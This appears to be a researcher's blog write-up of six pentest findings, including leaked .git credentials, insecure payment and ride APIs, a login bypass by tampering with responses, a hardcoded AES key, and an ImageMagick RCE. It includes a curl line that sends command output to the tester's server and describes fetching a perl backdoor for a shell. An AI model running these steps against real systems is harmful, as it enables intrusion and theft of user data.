• Twitter
  • Facebook
  • Youtube

Wednesday, May 24, 2017

Pawning the Web - Disclosing top 6 findings




Hello everyone, this is Shawar Khan and today i am going to disclose some of my top 6 findings that i guess were interesting and useful. I am going to disclose these so the viewers can apply the similar methodology and techniques used in the tests. Firstly, i want to let you guys know that each flaw was reported to the vendors and company owners to prevent the risk and i am not going to mention the company name to prevent the reputation damage.

The followings are shown in the write-up:
  • Hacking the Repository and accessing the Private SMS API
  • Viewing Payment information via Insecure API
  • Hacking into the Wind Turbine Panel
  • Getting AES Key and Decrypting encrypted data
  • Pwning the server having 1 million users with ImageMagick RCE
  • Getting Ride Information of any user

These are the findings that i am going to discuss in this write-up, so lets start!



Hacking the Repository & SMS API

Before we begin, i'd like to give an overview about what was done. While pentesting a web application and a bit of enumeration i was able to get into area that was holding the repository where all source code of the web app was available. Through that i hacked into the SMS API which i will show you in a while, the SMS API was used to send SMS from a specific SMS Mask. It was actually used for sending 2FA/Activation code on mobile numbers from a special SMS Mask.

Lets being,
When pentesting an application the most important thing is the information gathering phase, we have to get as much as information about target as possible. Most of the web developers leave sensitive files on the server due to their uncommon names and stuff. Those files  are not publicly available mostly so we have to enumerate and have to detect those files. Similarly, most developers leave GIT directory( .git ) after cloning a repository. This directory holds information about GIT repo and info about all files that were uploaded or deleted. If the GIT repository requires authentication, sometimes developers leave their credentials in the config file. Similar thing happened, first i got the .git directory by enumerating folders:
.GIT Directory Found with Nmap NSE Script

Now if the .git directory is readable or having directory listing, we could simply run the following command to get all the files available in that directory:
wget -m -I .git http://www.site.com/.git/
using the above command and using the git status command we could see all files uploaded and deleted on the web app, it will give us all the structure and all hidden files but what i found was something more interesting. I found that the config file located in the .git directory was having Repository credentials, the following information was in the file:
Directory Listing in the .GIT directory

Repository Credentials Leaking in Configuration File

Now thats interesting! I got a new subdomain which was holding the repository, i could simply clone the entire web app using the git clone command But first lets visit the new subdomain where repository was hosted. By using the credentials found, i was able to access their dashboard:
Dashboard Accessed by using the Credentials found
 After accessing the dashboard, i got access to multiple repositories and i got all the source code and files and also got access to some sensitive server information like database password and other stuff. After digging into it more, i cloned the repository which i guess was having  sensitive information. The applications seems to use Laravel PHP Framework.
 after reviewing each and every file i found something interesting in the /app/Http/Controllers/Auth/ directory. I found some sensitive information in the source code of a file located there which seems to be API information and after confirmation i found 3 SMS API being used along with their credentials:
1st SMS API Information

2nd SMS API Information

3rd SMS API Information
 Finally, i found 3 SMS APIs and their credentials. 2 of them were not working as one of it was deployed in the devices they use. The 3rd API seems to be working and it was having the same username that i found in config file in the beginning of the pentest. I tried using the credentials found in the source code but it was not working as the password was wrong. Bad Luck!, i tired using the password from the config file and it worked! I guess that was the new password. I accessed the SMS API and was able to send SMS to any number with "SMS" MSISDN Mask!
SMS Sent via API with "SMS" MSISDN Mask

It wasn't only the SMS API Hack but also i found some other serious issues that i didn't mentioned in this write-up. Just imagine the risk of leaving a file publicly available, due to that 'config' file i was able to access SMS API. So that's it!


Getting Payment Information via Insecure API endpoint

so, here is another interesting discovery. Many people asked me to disclose some API issues so i decided to disclose some interesting one. In this disclosure i found an API end point where i was able to get Information like "Credit Card Number","Location","User Information" and all other information that was used in the Payment process and also i was able to get a product for free. 

Whenever you are testing for API issues, make sure to get all the end points and understand the logic and flow of the application. Once you know the application flow you will be able to detect API flaws. In in web app, a registration form should be submitted in order to get to product purchase page. Once the transaction is done, an Order/Transaction ID is sent over an insecure challenge via GET method. The order ID can be stolen easily as its not securely transfered. 

Here is how the Registration Request looks like:
Registration POST Request to Registration API end point
after the registration the user is sent to the payment page after which there is the final page for Receipt. When the payment process is completed, the receipt page sends a request to an API endpoint having the Transaction/Order Id. The API end point was:
https://www.site.com/api/v2/get-lead/ORDER_ID_HERE
A GET request to the endpoint above having the Order id will result in complete transaction information in JSON:

Transaction Information in JSON form

 The 'get-lead' API endpoint shows complete transaction information when a Transaction/Order ID is entered, I tried some different Order IDs that i captured and i was able to get complete information of their transaction. In the above image the transaction information was of my orderId so i used null values to hide the info.
As the information was in JSON, i coded a python script to automate the flaw and for gathering the information in a well-readable form:
Transaction information captured using Python Script

I used test information just to show you how it actually works, the real information was sensitive and it can't be shown here publicly. Just by entering an Order ID we can get a complete transaction information. Thats due to insecure 'get-lead' API endpoint.



Hacking into the Wind Turbine Panel

I was given an IP Address of a Wind Turbine Panel for penetration test. All i had to do was to infiltrate into the password protected panel which was having all information about the Wind Turbine. Accessing the IP returned a panel:
Wind Turbine Login Panel
 I tried different methods to bypass and also tried to check if it can be bypassed using SQLI but didn't worked. Sometimes SQLI,Response Tampering,Force Browsing bypasses the password protected areas. But in this case they didn't worked so i tried to understand the flow of the application that how the authentication process was done. Nothing special was found, the panel was having a QR code. I tried some QR Code reader and it redirected to a Mobile Panel. I found that there was another panel specially designed for Mobile Browsers:
The difference between the both panels was that this was fully based on JS. Each functionality was executed using Javascript. I started reading the source code of the panel and found a JS file which was handling the login process:
JS File that controls the entire Application

The 'my-app.js' file was having an entire structure of the application behind the panel, as it was based on JS we can directly call any function. Whenever a similar flow is found, i try to understand how the login is successfully forwarded, by doing a code review of the JS file i tried to understand the response of the application when a valid password is given. The 'logIn()' function is triggered when the credentials is entered, after login the site responds with a message that tells the JS application whether the login was successful or not. An IF/ELSE condition was deployed but in an insecure way, the following is the code snippet that was insecure:
Insecure Code Snippet that led to Login Bypass
An IF/ELSE condition was used in the code, if the site responds with a "usererror" or "pwderror", then it means the login was not successful and the application will execute the 'myApp.loginScreen()' which will show the login panel. If the login is successful, the site returns a message "loginSuc" and then the application executes the "allStart()" and "myApp.closeModal()" function. The first function accesses the functionalities behind the login panel and the second function closes the login panel and gives access to the dashboard. Time for fun! Lets Bypass the panel.
I used invalid credentials to get the site response:
The site responds with 'usererror' message which means the login was not successful, lets change it to a valid response:
Changed the response to 'loginSuc' to fool the application and we'll get access to the Dashboard and Boom! We Got Access to the Dashboard!
Wind Turbine Speed & Temperature Stats

Wind Turbine Energy Consumption Stats

More Stats about the Turbines
 Thats it! We accessed the Wind Turbine Panel!


 

Getting AES Key and Decrypting encrypted data

When pentesting an android app, its important to know how the application is communicating with the web app and without it its thought to know the communication flow. I intercepted the application traffic and found that the data sent via 'params' parameter was encrypted:
Encrypted data being sent
Not only the data being sent, but also the response was encrypted:

So, the data being sent, and the data received from the web app was encrypted. There was no way i could decrypt that data. The data was not in plain form so i was not able to understand how the application was communicating with the web app and what the webapp was responding. I tried digging up into the application and before that i decompiled the application using apktool:
apktool d application.apk
also i converted 'dex' files to 'jar' using jex2jar:
jex2jar classes.dex
jex2jar classes2.dex

After decompiling and converting the dex files to jar i tried reading the jar file using  'JD-GUI' tool which is pre-installed in kali linux for reading jar files. After checking hundreds of classes available in the 'classes_dex2jar.jar' file i found a class named 'AuthenticateParentActivity.class' which was having something interesting. 

Found the AES Key that was used for Decrypting and Encrypting the data being sent and received! Thats what we wanted and now i was able to decrypt the data being sent and received that means the communication can be read!
Data successfully decrypted using the key! The key should never be hardcoded in the application or any place that could be accessed by a user. I found some more flaws after decrypting the data but i guess you've seen the interesting part! Thats how i found the AES key and decrypted the data.



Pwning the server having 1 million users with ImageMagick RCE

So, here is one of the best RCE i found, it was found in a famous company having almost 1million users. I was able to get into their servers by exploiting the imagemagick service being used. When testing for Remote Code Execution or File Upload flaws mostly the devs miss some points at image upload areas or profile picture change areas. Similar in this case, i found an image upload area. When exploiting ImageMagick, we have to create an image having our command which will send the reverse connection when a vulnerable function is applied on the image.

But in this case, the commands were not working properly and i was not getting reverse connection so i tried executing the curl command with imagemagick exploit:
curl http://myserver/$(id)

and the command was executed! I got a response of 'id' command executed on their server in my apache logs:


The command was successfully executed that means the server was vulnerable but i need to get a fully interactive shell. I tried executing telnet and bash commands to get a shell but the reverse shell closes after 2 seconds. That's because the command stops executing once the code executes so what i did was, i created 2 files:

one file for getting the perl backdoor from my server and the other files executes the perl shell.
I have uploaded the both files in my Github repo so you guys can view:
Launch.png & Make.png

This will do each thing separately which will give full interactive shell.
After uploading each file separately, i got the interactive shell! Rooted the server and got maximum privileges, thats it! ImageMagick Exploited:


 

Getting Ride Information of any user

 Here is another interesting API issue that i have identified in a Car service. Every pentest starts with information gathering, by gathering information about the target i found an administrator panel. The admin panel was password protected but by gathering some information over Bing i found an API endpoint which was showing location of a ride. The logic of application is, a user requests a ride and travels to a location. The users get a special Booking Id. The API endpoint shows location where the user traveled by taking the Booking Id as input. The endpoint was similar to the following:
If a Booking Id is replaced with the number, it will show the location of the Ride taken by a user. This flaw was found by gathering information of the target using Google Dorks and Bing. Gathering Information is one of the most important phase and simple techniques can lead to serious risk. I gathering some Booking Ids so i can get some user information:

I coded an exploit for this issue and by entering Booking id the Locations is captured:

I've uploaded the exploit code to my github so you can see the code: Ride Information Gather Exploit 
Just by finding insecure APIs in the target web application we can discover interesting issues, i hope that you guys will love this.

Thanks for viewing, please share and comment if you like this write-up.

regards,

Shawar Khan
Security Researcher
    Post a Comment

    Contact

    Get in touch with me